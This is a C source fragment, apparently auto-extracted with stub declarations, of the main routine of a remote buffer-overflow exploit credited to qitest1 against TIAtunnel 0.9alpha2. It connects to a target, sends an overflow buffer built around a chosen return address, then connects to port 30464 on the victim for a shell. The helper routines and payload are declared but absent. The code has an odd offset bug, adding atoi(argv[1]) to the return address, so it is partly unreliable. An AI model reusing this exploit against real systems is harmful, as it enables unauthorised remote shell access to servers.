
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* descr; int retaddr; } ;


 int EOF ;
 int atoi (char*) ;
 int do_mybuf (int ) ;
 int getopt (int,char**,char*) ;
 int mybuf ;
 char* optarg ;
 int printf (char*,...) ;
 int send (int,int ,int ,int ) ;
 int shellami (int) ;
 int sleep (int) ;
 int sockami (char*,int) ;
 int strcat (int ,char*) ;
 char* strdup (char*) ;
 int strlen (int ) ;
 TYPE_1__* target ;
 int usage (char*) ;

main(int argc, char **argv)
{
int i,
 sel = 0,
 port = 0,
 offset = 0,
 sock,
        cnt;
char *host = ((void*)0);

  printf("\n  TIAtunnel-0.9alpha2 exploit by qitest1\n\n");

  if(argc == 1)
        usage(argv[0]);
  while((cnt = getopt(argc,argv,"h:p:t:o:")) != EOF)
    {
   switch(cnt)
        {
   case 'h':
     host = strdup(optarg);
     break;
   case 'p':
     port = atoi(optarg);
     break;
   case 't':
     sel = atoi(optarg);
     break;
   case 'o':
     offset = atoi(optarg);
     break;
   default:
     usage(argv[0]);
     break;
        }
    }
  if(host == ((void*)0))
        usage(argv[0]);
  if(port == 0)
 usage(argv[0]);

  printf("+Host: %s\n  as: %s\n", host, target[sel].descr);
  printf("+Connecting to %s...\n", host);
  sock = sockami(host, port);
  printf("  connected\n");

  target[0].retaddr += atoi(argv[1]);
  printf("+Building buffer with retaddr: %p...\n", target[0].retaddr);
  do_mybuf(target[0].retaddr);
  strcat(mybuf, "\n");
  printf("  done\n");
  send(sock, mybuf, strlen(mybuf), 0);
  printf("+Overflowing...\n");

  printf("+Zzing...\n");
  sleep(2);
  printf("+Getting shell...\n");
  sock = sockami(host, 30464);
  shellami(sock);
}
